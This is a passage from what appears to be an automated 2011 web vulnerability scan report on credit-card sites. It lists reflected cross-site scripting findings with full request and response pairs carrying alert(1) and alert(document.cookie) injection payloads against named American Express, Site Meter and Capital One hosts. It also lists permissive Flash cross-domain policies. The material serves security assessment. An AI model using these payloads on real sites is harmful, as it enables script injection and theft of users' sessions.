Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
et.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPMLa94eb"-alert(1)-"313a6721a4e&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat
...[SNIP]...

3.23. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [EAID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the EAID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a9c0"-alert(1)-"d44ba865ee5 was submitted in the EAID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g8a9c0"-alert(1)-"d44ba865ee5 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:14 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g8a9c0"-alert(1)-"d44ba865ee5", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl685;ord=1;num=" } };
</script>
...[SNIP]...

3.24. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a69c8"-alert(1)-"36ea2529e7b was submitted in the PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8"-alert(1)-"36ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:17 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...

if(!!!aet) var aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1a69c8"-alert(1)-"36ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi
...[SNIP]...

3.25. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PSKU parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The value of the PSKU request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c97db"-alert(1)-"1e180ee12fb was submitted in the PSKU parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCBc97db"-alert(1)-"1e180ee12fb&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:43 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
aet = {}; aet.data = {"page" : {"type" : "DLP", "name" : "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCBc97db"-alert(1)-"1e180ee12fb&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=
...[SNIP]...

3.26. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b53"-alert(1)-"d28366bbd68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g&31b53"-alert(1)-"d28366bbd68=1 HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:36 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
: "pm0002", "cheetahmail" : {"aid" : "", "n" : "", "fsub" : "", "OA_RECENT_SRC" : "", "OA_PRODID" : "" },"querystring" : "PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g&31b53"-alert(1)-"d28366bbd68=1", "estara" : "as00.estara.com/fs/lr.php?onload=1&accountid=200106285055", "doubleclick" : "https://fls.doubleclick.net/activityi;src=1297440;type=singl842;cat=singl685;ord=1;num=" } };
</script>
...[SNIP]...

3.27. http://s46.sitemeter.com/js/counter.asp [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f2b"%3balert(1)//04af98ca68 was submitted in the IP cookie. This input was echoed as 70f2b";alert(1)//04af98ca68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.asp?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E24370f2b"%3balert(1)//04af98ca68

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7291
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:21 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.24370f2b";alert(1)//04af98ca68";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.28. http://s46.sitemeter.com/js/counter.js [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s46.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a03b3"%3balert(1)//8ea5d3eaa40 was submitted in the IP cookie. This input was echoed as a03b3";alert(1)//8ea5d3eaa40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.js?site=s46cccgblog HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/fine-print/?3cf6d%22-alert(document.cookie)-%22cf7270b0551=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243a03b3"%3balert(1)//8ea5d3eaa40

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 17 Jun 2011 12:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7292
Content-Type: application/x-javascript
Expires: Fri, 17 Jun 2011 12:21:25 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243a03b3";alert(1)//8ea5d3eaa40";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.29. http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [v1st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/smallbusiness/cards/venture-for-business/

Issue detail

The value of the v1st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e34f0'-alert(1)-'3ba5a5acf1a was submitted in the v1st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251 HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4e34f0'-alert(1)-'3ba5a5acf1a; itc=CAPITALONE11NZZZintmktgD4; caponesn=d526e113S04syM9LTU6OK7YyMrNScnRzszIyMLAwMDEw0i1JNzDUNTIwNDQwM7BUso4zNDU1sAQA; BIGipServerpl_capitalone.com_80=828974346.29215.0000; external_id=GAN_ZZ10700001_USCGAN_j26689465k112308_631528059; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:24 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: WWWJSESSIONID=qkZxN7BcpXhPk0gtJ1DXnng9KSl3HQQTgYMdyyJQW5Y95KMYgCkv!1127808106!103720762; domain=.capitalone.com; path=/; secure
Set-Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; domain=.capitalone.com; expires=Monday, 14-Jun-2021 11:59:24 GMT; path=/
Set-Cookie: SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
Set-Cookie: portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D; domain=.capitalone.com; expires=Saturday, 18-Jun-2011 11:59:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
Content-Length: 39050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/><meta http-e
...[SNIP]...
'TestCell','02'); //All pages
lpAddVars('session','Behavior',''); //All pages
lpAddVars('session','InsertRule',''); //All pages
lpAddVars('visitor','VisitorID','FB8DCF93533EFDA4e34f0'-alert(1)-'3ba5a5acf1a'); //All pages
lpAddVars('page','Section','Venture for Business'); //All pages
lpAddVars('session','pageName',''); //All pages
lpAddVars('session','LPgroup',''); //All pages

...[SNIP]...

4. Flash cross-domain policy previous next
There are 25 instances of this issue:

http://ad.doubleclick.net/crossdomain.xml
http://americanexpress.122.2o7.net/crossdomain.xml
http://as00.estara.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://cctrkom.creditcards.com/crossdomain.xml
http://creditcardscom.112.2o7.net/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://integrate.112.2o7.net/crossdomain.xml
http://metrics.citibank.com/crossdomain.xml
http://omn.americanexpress.com/crossdomain.xml
http://pixel.33across.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://www.creditcards.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://oc.creditcards.com/crossdomain.xml
http://s46.sitemeter.com/crossdomain.xml
http://www.discovercard.com/crossdomain.xml
https://www.discovercard.com/crossdomain.xml
http://www.wtp101.com/crossdomain.xml
http://www201.americanexpress.com/crossdomain.xml
https://www201.americanexpress.com/crossdomain.xml
http://citi.bridgetrack.com/crossdomain.xml
http://creditcards.citicards.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Fri, 17 Jun 2011 12:04:21 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://americanexpress.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://americanexpress.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: americanexpress.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:44 GMT
Server: Omniture DC/2.0.0
xserver: www419
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.3. http://as00.estara.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:49 GMT
Server: Apache
Last-Modified: Thu, 05 May 2011 11:39:26 GMT
Accept-Ranges: bytes
Content-Length: 567
Cache-Control: max-age=2592000
Expires: Sun, 17 Jul 2011 12:03:49 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.estara.com" />
<allow-access-from domain="*.sh01.de" />
<allow-access-from domain="*.dwsgo.de" />
<allow-access-from domain="*.sosbonnesexcuses.com" />
<allow-access-from domain="*.lagencesecrete.com" />
<allow-access-from domain="*.livefeeds.gr" />
<allow-access-from domain="*.paeiopaliosoxronos.gr" />
<allow-access-from domain="*.kokkinostypos.gr" />
<allow-access-from domain="*" />
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sat, 18 Jun 2011 11:59:07 GMT
Date: Fri, 17 Jun 2011 11:59:07 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://cctrkom.creditcards.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:35 GMT
Server: Omniture DC/2.0.0
xserver: www433
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.6. http://creditcardscom.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://creditcardscom.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: creditcardscom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Omniture DC/2.0.0
xserver: www71
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.7. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 16 Jun 2011 20:44:31 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 55180
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://integrate.112.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
xserver: www98
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://metrics.citibank.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:58 GMT
Server: Omniture DC/2.0.0
xserver: www5
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://omn.americanexpress.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://omn.americanexpress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: omn.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:33 GMT
Server: Omniture DC/2.0.0
xserver: www42
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://pixel.33across.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 211
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.12. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
